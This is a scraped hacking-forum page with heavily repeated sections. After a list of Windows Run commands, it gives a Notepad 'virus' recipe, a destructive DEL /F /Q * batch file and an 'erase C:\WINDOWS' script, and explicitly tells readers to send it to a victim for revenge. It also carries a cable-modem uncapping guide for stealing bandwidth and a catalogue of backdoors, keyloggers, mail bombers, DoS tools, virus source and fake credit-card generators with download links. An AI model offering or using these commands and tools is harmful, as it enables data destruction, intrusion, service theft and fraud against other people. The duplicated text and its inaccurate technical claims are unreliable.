Offline
Special Moderator
Special Moderator
User avatar
Joined: February 11th, 2008, 11:01 am
Posts: 732
Location: Youngistan!!
Nick Name: I aint a pet!! lol..
Accessibility Controls = access.cpl
Add Hardware Wizard = hdwwiz.cpl
Add/Remove Programs = appwiz.cpl
Administrative Tools = control admintools
Automatic Updates = wuaucpl.cpl
Bluetooth Transfer Wizard = fsquirt
Calculator = calc
Certificate Manager = certmgr.msc
Character Map = charmap
Check Disk Utility = chkdsk
Clipboard Viewer = clipbrd
Command Prompt = cmd
Component Services = dcomcnfg
Computer Management = compmgmt.msc
Date and Time Properties = timedate.cpl
DDE Shares = ddeshare
Device Manager = devmgmt.msc
Direct X Control Panel (If Installed)* = directx.cpl
Direct X Troubleshooter = dxdiag
Disk Cleanup Utility = cleanmgr
Disk Defragment = dfrg.msc
Disk Management = diskmgmt.msc
Disk Partition Manager = diskpart
Display Properties = control desktop/desk.cpl
Dr. Watson System Troubleshooting Utility = drwtsn32
Driver Verifier Utility = verifier
Event Viewer = eventvwr.msc
File Signature Verification Tool = sigverif
Findfast = findfast.cpl
Folders Properties = control folders
Fonts = control fonts
Fonts Folder = fonts
Free Cell Card Game = freecell
Game Controllers = joy.cpl
Group Policy Editor (XP Prof) = gpedit.msc
Hearts Card Game = mshearts
Iexpress Wizard = iexpress
Indexing Service = ciadv.msc
Internet Properties = inetcpl.cpl
IP Configuration = ipconfig
Java Control Panel (If Installed) = jpicpl32.cpl
Java Application Cache Viewer (If Installed) = javaws
Keyboard Properties = control keyboard
Local Security Settings = secpol.msc
Local Users and Groups = lusrmgr.msc
Logs You Out Of Windows = logoff
Microsoft Chat = winchat
Minesweeper Game = winmine
Mouse Properties = control mouse
Mouse Properties = main.cpl
Network Connections = control netconnections
Network Connections = ncpa.cpl
Network Setup Wizard = netsetup.cpl
Notepad = notepad
Nview Desktop Manager (If Installed) = nvtuicpl.cpl
Object Packager = packager
ODBC Data Source Administrator = odbccp32.cpl
On Screen Keyboard = osk
Opens AC3 Filter (If Installed) = ac3filter.cpl
Password Properties = password.cpl
Performance Monitor = perfmon.msc
Performance Monitor = perfmon
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Printers and Faxes = control printers
Printers Folder = printers
Private Character Editor = eudcedit
Quicktime (If Installed) = QuickTime.cpl
Regional Settings = intl.cpl
Registry Editor = regedit
Registry Editor = regedit32
Remote Desktop = mstsc
Removable Storage = ntmsmgr.msc
Removable Storage Operator Requests = ntmsoprq.msc
Resultant Set of Policy (XP Prof) = rsop.msc
Scanners and Cameras = sticpl.cpl
Scheduled Tasks = control schedtasks
Security Center = wscui.cpl
Services = services.msc
Shared Folders = fsmgmt.msc
Shuts Down Windows = shutdown
Sounds and Audio = mmsys.cpl
Spider Solitare Card Game = spider
SQL Client Configuration = cliconfg
System Configuration Editor = sysedit
System Configuration Utility = msconfig
System File Checker Utility = sfc
System Properties = sysdm.cpl
Task Manager = taskmgr
Telnet Client = telnet
User Account Management = nusrmgr.cpl
Utility Manager = utilman
Windows Firewall = firewall.cpl
Windows Magnifier = magnify
Windows Management Infrastructure = wmimgmt.msc
Windows System Security Tool = syskey
Windows Update Launches = wupdmgr
Windows XP Tour Wizard = tourstart
Wordpad = write
Custom Search
Monday, July 14, 2008
How to make a powerfull virus with only notepad
To delete all folders/files just put this:
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
DEL /F /Q *
Into notpad and save it as whateveryouwant.cmd
It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.
WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER
If you just want to delete the WINDOWS file do this:
The only thing you need again is Notepad.
Now, to test it, create a textfile called TEST.txt in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" then open up C:\ and you'll see your Test.txt is gone. Now, the real work begins:
Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.
Simple explanation:
Go to notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
Reveal Passwords Hidden Under Asterisks
It's a good practice not to use the same password on everything. This is because if your ONLY password falls in the wrong hands, the next thing you know is you won't be able to access anything at all. Imagine you loose access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet Bank account and etc within a day! You'll go crazy loosing all your contacts and you know someone is having a great time reading all your personal emails.
For me, I use different password for softwares/websites and most of it is saved on my laptop for easy access. Problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisk *******
I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.
Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.
Reveal hidden password in Google Talk (Software)
Reveal hidden password in Internet Explorer (Web Page)
Both Google Talk and Internet Explorer is active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under asterisks.
Just a word of advice, please use this tool to recover your OWN password. If you get caught in using this tool to steal people's password, you can get into serious trouble. Treat this tool as a useful recovery too instead of hacking tool.
Note: Asterisk Key doesn't reveal password hidden under asterisk in Firefox browser.
Download Asterisk Key
http://www.lostpassword.com/f/downloads/ariskkey/ariskkey.exe
For me, I use different password for softwares/websites and most of it is saved on my laptop for easy access. Problem is, if you use too many different passwords, sometimes we tend to forget the password that we set for the software or website. If the password is saved, you can easily use a tool to show the password hidden under the asterisk *******
I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.
Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.
Reveal hidden password in Google Talk (Software)
Reveal hidden password in Internet Explorer (Web Page)
Both Google Talk and Internet Explorer is active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under asterisks.
Just a word of advice, please use this tool to recover your OWN password. If you get caught in using this tool to steal people's password, you can get into serious trouble. Treat this tool as a useful recovery too instead of hacking tool.
Note: Asterisk Key doesn't reveal password hidden under asterisk in Firefox browser.
Download Asterisk Key
http://www.lostpassword.com/f/downloads/ariskkey/ariskkey.exe
Cable Modem Hacking Kit V.8.0
Make sure you understand these:
1. This process is real and can increase the speeds you get from your cable service.
2. This guide may not work with all modems it is currently only known to work with surfboard modems but should work with others.
3. No matter how much you uncap you can be caught JUST AS EASILY use at your own risk.
4. Don’t be disappointed if this does not work for you certain configurations with your modem or isp may prevent you from properly performing this process.
5. I CANNOT help you if you do NOT have a Surfboard modem.
6. Finally please read through all of the documentation before asking me or anyone else for support thank you.
7. Every Step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.
link
http://d01.megashares.com/?d01=34cfdda
1. This process is real and can increase the speeds you get from your cable service.
2. This guide may not work with all modems it is currently only known to work with surfboard modems but should work with others.
3. No matter how much you uncap you can be caught JUST AS EASILY use at your own risk.
4. Don’t be disappointed if this does not work for you certain configurations with your modem or isp may prevent you from properly performing this process.
5. I CANNOT help you if you do NOT have a Surfboard modem.
6. Finally please read through all of the documentation before asking me or anyone else for support thank you.
7. Every Step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.
link
http://d01.megashares.com/?d01=34cfdda
ALL HACKING TOOLS ( RS LINKS BELOW)
Backdoor: Intrude computer and control the computer with client program.
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.
Backdoor
1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.
Crack tool
1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Microsoft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
31. MakePwl: Create the PWL files.
32. NtPassword: Find holes in system security.
33. PGP Crack: Crack the PGP.
34. PWLCRACK: Crack the PWL files.
35. PalmCrack 1.1: The password testing tool for the Palm Computing Platform.
36. Passware Kit: Recover the password.
37. Password Recovery Tools: Recover some passwords.
38. Password dictionaries: Used by cracker to crack the password.
39. PwlTools: Recover login password.
40. Quicken Password Recovery Key: Recover password.
41. Register: Register the software.
42. RemPass Ver 2.6: Crack password of BIOS.
43. SERIALS 2000: Crack the register code.
44. Serial number: Used by cracker to crack s/n.
45. THC-CUPASS: Crack password of user on a WindowsNT/W2K server.
46. THC-PrintDates: Crack password using date.
47. Unix password crackers: Crack passwords for unix.
48. Windows crack: Crack password on windows.
49. Windows password crackers: Crack password on windows.
50. Word List: Word dictionary.
51. WordPerfect Password Recovery Key: Recover passwords for WordPerfect document files.
52. Wzippwd: Creates valid serial number for Winzip.
53. ZIP Cracker: Cracks ZIP Files that are password protected.
54. iMesh Password Recovery: Recover a password installed in the iMesh client.
55. variation tool: Prepare the word list used by cracker to crack password.
Disassembler
1. ASMGEN: A program to generate cross-referenced assembly language code from any executable file.
2. Bubble Chamber: Disassemble executable files.
3. DoDi’s Visual Basic Tools: DoDi is a VB kit.
4. PROVIEW: Analyze and view system.
5. Windows Disassembler: Disassembe Windows executables and dynamic link libraries.
DoS tool
1. Black: Bomb someone’s computer with it.
2. IGMP Nuker: Bomb other’s computer with this popular tool.
3. Windows DoS kit: Attack computer systems with this useful tools.
4. pagebomb: Bomb windows pager with this tool.
5. windows95/98 patch: Patch you system in order to avoid attack by hackers.
Document
1. Article about hack: Introduce some knowledge about hack.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what is DoS attack.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Aticles about hack: Narrate some knowledge about hack.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about linux.
9. Books about network: Tell you knowledge about network.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you some about jargon.
12. Document about pbx: Introduce some pbx knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce you some information.
15. Phrack Documents: Discuss some questions about phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.
E-mail tool
1. Anima: Bomb some others’ computers with this tool(e-mail bomber).
2. Anonymous emailer: Send e-mail without being recognized.
3. Bomber: Bomb someone’s e-mail box with it.
4. E-mail bomber kit: Bomb some e-mail box with these tools.
5. Euthanasia: Bomb other’s e-mail address with this tool.
6. Extreme mailer: Bomb some victim’s e-mail address with it.
7. Haktek: Use this program to attack your victim or protect yourself from being hacked.
8. KaBoom!: Bomb other’s e-mail box.
9. Mail Bomb: Bomb your victim by this e-mail bomber.
10. News Mail Agent: Find any e-mail address in news groups.
11. Quick Fyre: QuickFyre is an anonymous emailer \ mail bomber.
12. Stealth Mailer: Send bombs to other people with this tool.
13. Unabomb: Send people email bombs.
14. Web Mail Agent: Find any e-mail address in the internet.
Editor
1. HEXCALIBUR: Examining, modify or otherwise manipulate disk files in their raw, or binary format.
2. HEXpert for Windows: Edit windows multi-format binary files.
3. Hex Workshop: Edit, insert, delete, cut, copy, and paste hex to your files.
4. Hexedit: Edit your raw files.
5. Hiew: Dump NE-executable file and dump LE/LX-executable file.
6. Script Hack Wizard: Allow you to hack or modify many language scripts with ease.
7. Support Files: Add the necessary files that script hack wizard uses to run.
Encryption & decryption tool
1. Apocalypso: Crypto tool from HNC.
2. Cryptonite Pro: Uses a superfast 64 bit encryption algorithm on Windows 95/98/Me.
3. EasyFP: Performs file encryption to protect your files and folders from being read by others.
4. Encryption: Encrypt your system information by four tools.
5. Encryption tools: Collecting a huge munber of encryption and decryption tools.
6. Encryptonite: Encrypt and decrypt text file with it easily.
7. HTML Encrypt: Encrypt your HTML/Script program.
8. Macintosh Encryption: Include various Macintosh encryption tools.
9. NetMangler: Encrypt your emails and protect yourself with NetMangler.
10. PC-Encrypt: Compress and encrypt almost any type of file.
11. PGPfreeware: Protect your email form unauthorized view.
12. WebPassword: Protect your web pages with password.
13. WinSafe: Encrypt your files with some powerful algorithms.
Executable file tool
1. Bound File Detector & Remover: Detect bound file with this tool.
2. Exe file tool: Manage the exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid av detection.
6. PEBundle: Allow for DLLs or other files to be ??bundled?? with an executable file.
7. Topo: Scan all sections in order to find large ‘usable’ areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Bind 2 executables in one.
ICQ tool
1. Advanced ICQ Password Recovery: Recover passwords to ICQ accounts.
2. Aquila: Recover your passwords with it.
3. ICQ Document: There are two documents about ICQ.
4. ICQ File Share: Share your files over the internet with your online friends.
5. ICQ MachineGun: Attack victim computer by ICQ.
6. ICQ kit: Attack your victim with these tools.
7. ICQr Information: Read and reveal personal information stored in Mirabilis ICQ Database (.DAT) files.
8. PGP-ICQ: Encrypt your ICQ messages.
9. SecureICQ: Allow you to encrypt messages you send and to decrypt encrypted messages you receive.
10. Send It Agent: Send very large data in no time to the ICQ users.
11. Source code about ICQ: Snoop ICQ traffic for a set host.
Keylogger
1. G2kBIOSspoof: Spoof BIOS password for gateway pc’s simply.
2. HookThis: Set a systemwide keyboard-hook.
3. Hooker: Make intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with tiny module that clips on to PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard key effectively!.
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Include keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on PC and saves all information in the LOG files.
11. PC Acme Pro: Monitor software on PC and saves all information in the LOG files.
12. Phantom2: Record and playback a keystroke program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitors kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.
MISC
1. Game Hack: Having Game Wizard 32 and CrackAid, two tools.
2. HeadStrong WebClicker: Use public proxies to create artificial banner ad clicks.
3. Linux_misc: Collect many Linux misc tools with some source files as TCFS, SILC, DDNSF, St Jude, FreeVSD.
4. Misc: Include many misc of source codes and tools that can do such job as hijacking, monitoring, or interception, etc.
5. Quick Socket: Allow you administrator to chat (via keyboard) directly to a remote user also running Quick Socket.
6. Shutdown 2000: Disturb running application program.
7. Windows_misc: Contain all kinds of Windows misc tools, especially Wat, Stealth Proxy, Outlook Header Exp, WebClicker2.0, Ap2.74, etc.
Packet forging
1. Netcat: Reading and writing data utility across network connections using TCP or UDP protocol.
2. Packet_Forging: Include 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Having other five packing tools as tcpkill, packetx1, msmh, LibnetNT, arpinject in the kit.
4. Pksnd102: Packing 16 files as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy, Dis_pkt9 in it, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allow you free reign to directly forge the packet in any way you so desire.
6. Snot: Use snort rules files as its source of packet information.
7. Winject: Inject packet for Windows 9x, also called drugs for Windows.
Phreak tool
1. Auto Dial: Help you to use a war dialer easily.
2. Blue Dial: Make it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deal out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Call random pagers, puts in a phone number, hangs up, and goes all over again.
6. CPhreak: It is the first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Search for dial tones and carriers in the same call.
9. No Carrier: Scan with Dos shell, graphics and more!.
10. POCSAG Decoder: Allow the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or Page ONE pager and put in a billion numbers!.
12. PhoneTag: Check for starttime every second while it’s running.
13. Phreak box: Construct and use phreak box.
14. Super Dial: Call all of your town (or cities) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: It is another wardialer.
17. Tone Loc Utilities: It is also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone with it.
Scanner
1. 7th Dimension Port Scanner: Scan your port address more easily.
2. AB Complete Ping: Allow you to ping one or more IP addresses, to scan a network for shared resources and to scan a computer for open ports.
3. Angry IP Scanner: Scan IP very easily and rapidly!.
4. Dave’s Port Sniffer: Detect FTP, HTTP, POP, SMTP, TELNET and FINGER deamons running on any TCP host machine.
5. DeadBolt: Monitor holes in Windows and alert you when it detects suspicious activity, giving you the power to stop viruses dead in their tracks!.
6. Linux-Vuln-source: Carry the two scanner as Rnmap and VLAD ’s system security kit!.
7. MacAnalysis: Audit suite for your Macintosh to perform and help implement a security standard for your computer/network by performing some work.
8. NetBIOS Security Kit(unix): Perform various security checks on remote servers running NetBIOS file sharing services.
9. NetBIOS Security Kit(windows): Perform various security checks on remote servers running NetBIOS file sharing services.
10. Netmon: Monitor network connections.
11. Nmap: Explore or security audit network on Linux or Unix.
12. Port Invader: Scan a range or list of IP addresses to verify if there are open or closed ports.
13. Port Scanner: Scan a group of IP address looking for the presence of specific incoming TCP/IP ports.
14. PortScan: Scan port fast and configurably!.
15. Port_Scanner: Collet 20 tools to use in port sacanner on Linux or Unix!.
16. Portscan SMS Alert: Alert you when probed scandlogd logs information to syslog and invokes this shell script.
17. Scanner: Collect 84 tools and misc to scan.
18. SecureScan NX: Scan your distributed network architecture for vulnerabilities from one central location.
19. SkPortScan ActiveX Control: Integrate port-scanning capabilities into your applications with this ActiveX control.
20. THC-HappyBrowser: Check an NT-Server/Webserver for known vulnerabilities.
21. THC-Probe: Scan compilation for Linux.
22. THC-Scan: Automate tone, carrier, vmb scanning.
23. WhereIsIP: Find the geographic location of chat room members, ICQ members, and more.
24. Windows_Trojan_Scanner: Collect 6 little tools scanning whole networks to find well known Trojans.
25. Windows_port_scanner: Collect 9 Port Scanner running on Windows.
26. XSharez scanner: Scan, search and get specific resources for you.
Sniffer
1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: It is a TCP/IP Network Sniffer & Analyzer program based on Windows system.
3. Ethereal0814: Free network protocol analyzer’s another version.
4. Ethereal0817: Analyze network protocol, another version of Ethereal.
5. Ethereal0820: Analyze network protocol freely for Win32.
6. Libpcap062: Needed for capturing packet to you as the packet capture library, the latest release of Libpcap.
7. Linux_sniff_source: Contain 18 sniffer tools on Linux and some source files.
8. LittleBrother: Allow supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyze, Monitor Traffic, and Generator Packet program.
10. PacketX: Integrate winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit’s own security sniffer: Open a network interface for all packets and not only for these packets, which are send to this interface.
12. Proxy Workbench: It is a unique proxy server ideal for developers, trainers and security experts that displays its data in real-time.
13. Snarp: Allow the host to sniff the data from the wire.
14. Sniff-em: Base on a competively priced, performance minded Windows as a Network analyzer.
15. Sniffers: Having 34 files in it and among that are 28 sniffer tools and some source codes.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: Use newly and easily internet enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dumper program pretty much for the original protocol packet.
19. Windows_sniff: Facilitate the capture and visualization of network traffic kit of 5 tools and 1 source code files.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!.
Snoop tool
1. ID: Display the ID information of machine’s specific hardware.
2. IPQuery: Show the current IP Address.
3. NetroSnooper: Find hidden files on the internet!.
4. Network Inventory: Provide network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft’s IP Tool: Tell you your IP Address in a variety of ways.
6. ShellSPY: Track every process running on your PC.
7. Trouble In Paradise: Install nothing but trouble your machine with some showing message.
8. iNetTools for Windows: Collect menu-driven testing tools for internet and IP-based networks.
Source code
1. APG: Set for random password generation.
2. ARP Monitor: Trace arp requests from/to your machine.
3. Asm: Including msmh, inpect, GetDialPasswords, it is a kit.
4. Backdoor: Includes 17 Backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer, this includes its source code.
6. C_SOURCE: Contain 4 files in it, and get the tools source code after decompress them.
7. Emailcrk: Crack password of e-mail account.
8. Findhost: Scan port on the net for you.
9. Harvester: Contain the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Use IGMP packet tool’s source code.
11. Jail Chroot Project: Build a chrooted environment on POSIX with source code of C.
12. Keylogger_SRC: Include all the full source of Keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimick as much functionality in GNU grep as possible, applied at the network layer.
15. Nutcracker: Check/crack password tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world’s best encryption software.
17. Portscanner: Scan a group of IP address.
18. SecurityFocus ARIS Extractor: Analyze IDS log sophisticatedly and filter important attacks from the noise.
19. ShareDecryption: Extract share passwords from registry.
20. VB_SOURCE: Contain 14 files in it, and get the tools source code after decompress them.
21. Wnuke4: This is the complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool’s source code!.
Spoof
1. Credit probe: Creates fake credit card numbers.
2. HTTPort: Establish a transparent TCP/IP tunnel through a proxy server.
3. IP Spoofer: Support IP spoofing software kit.
4. Ircgspoofer: Spoofer software on IRC Ghost.
5. Pinger: Trick your ISP into thinking you are always active.
Virus
1. Virus_exe: Including six most typical executable virus programs.
2. Virus_source: Containing many virus source codes in the package, this page will be devoted to Virii and Trojan’s, 89 files in all.
Backdoor
extract the file and rename it to ISO
CODE
Code:
http://rapidshare.de/files/34835184/CEH.part01.rar
http://rapidshare.de/files/34835226/CEH.part02.rar
http://rapidshare.de/files/34835342/CEH.part03.rar
http://rapidshare.de/files/34835424/CEH.part04.rar
http://rapidshare.de/files/34835214/CEH.part05.rar
http://rapidshare.de/files/34835413/CEH.part06.rar
http://rapidshare.de/files/34835235/CEH.part07.rar
http://rapidshare.de/files/34835124/CEH.part08.rar
Crack tool: Crack passwords of systems or applications, crack the serial numbers.
Disassembler: Disassemble the program with it. If you have a executable file, you can look the source code of this file with it.
DoS tool: Make computer stop to respond to any request with these tools, so other people can not access the computer.
Document: Documents about hacker, cracker, etc.
E-mail tool: Destroy the computer system using these tools, the tools are all related to e-mail. It includes several tools about e-mail, for example, email bomber, tool to find someone’s email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools, bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy the computer system using these tools, the tools are all related to ICQ. All programs in it work with ICQ. With the tools, you can do many things, for example, recovering ICQ’s password, sharing your files, and encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes when the program is running, so you can get some useful information, for example, password.
MISC: Examine source code for security holes, hack games, and other interesting tools for both linux and windows.
Packet forging: Modify the data packet on network at will.
Phreak tool: Test the paging transmitters and systems, and so on, it includes box and wardialier.
Scanner: Acquire the system information, for example, open ports, OS, and so on.
Sniffer: Intercept and capture the data on the network.
Snoop tool: Show information of your system. For example, it can show IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, creates fake credit card numbers, ip spoof, etc.
Virus: Source code of virus and executable virus.
Backdoor
1. Back Orifice: Tools about back orifice.
2. Backdoor kit: Collection of many backdoor program.
3. Backdoor source: Source of backdoor program.
4. Minigift: Another backdoor program.
5. Net spy: Allow you to gain control of another computer using the internet.
6. Trojan: Control other people’s computer.
Crack tool
1. AMI Crack: Crack the Ami BIOS.
2. AMI Decoder: Crack the password of ami BIOS.
3. ARJ Cracker: Cracks password protected ARJ Files.
4. AW: Crack the password of BIOS.
5. Adv Office 2000 Password Recovery (pro): Crack the password.
6. Adv Office 2000 Password Recovery (std): Crack the password.
7. Advanced Archive Password Recovery: Crack the password of archive.
8. Advanced Excel 2000 Password Recovery: A program to recover lost or forgotten passwords to files/documents created in Microsoft Excel.
9. Advanced NT Security Explorer: An application for Windows NT/2000/XP system administrators for finding holes in system security.
10. Advanced Outlook Express Password Recovery: Crack the outlook express password.
11. Advanced PDF Password Recovery Pro: Crack the PDF password.
12. Advanced Word 2000 Password Recovery: Crack the password of word 2000.
13. Advanced ZIP Password Recovery: Crack the password of zip.
14. Ami BIOS cracker: Crack password of ami BIOS.
15. BIOS / CMOS tools: Crack the password of BIOS and CMOS.
16. CryptoExplorer for Borland Paradox: Recover Borland Paradox passwords.
17. Dictionary: Used by cracker to crack the password.
18. Dictionary Maker: Makes dictionary files for password crackers.
19. FBRUTE: Crack unix password.
20. Hades cracker: Crack the password.
21. John The Ripper: Crack unix password.
22. Kill CMOS ver 1.00: Crack the password of CMOS.
23. L0phtCrack 2.01: Recover passwords for Windows NT.
24. Lilo crack: Crack password of lilo.
25. Linux crack: Crack password on linux.
26. Lotus 1-2-3 Password Recovery Key: 1-2-3 Key is a program to recover passwords for Lotus 1-2-3 documents.
27. Lotus Word Pro Password Recovery Key: Recover Lotus Word Pro Password.
28. MS Access Password Detection: Crack password of MS Access.
29. Mac crack: Crack password on Mac.
30. MailPassword: Recover lost password of e-mail.
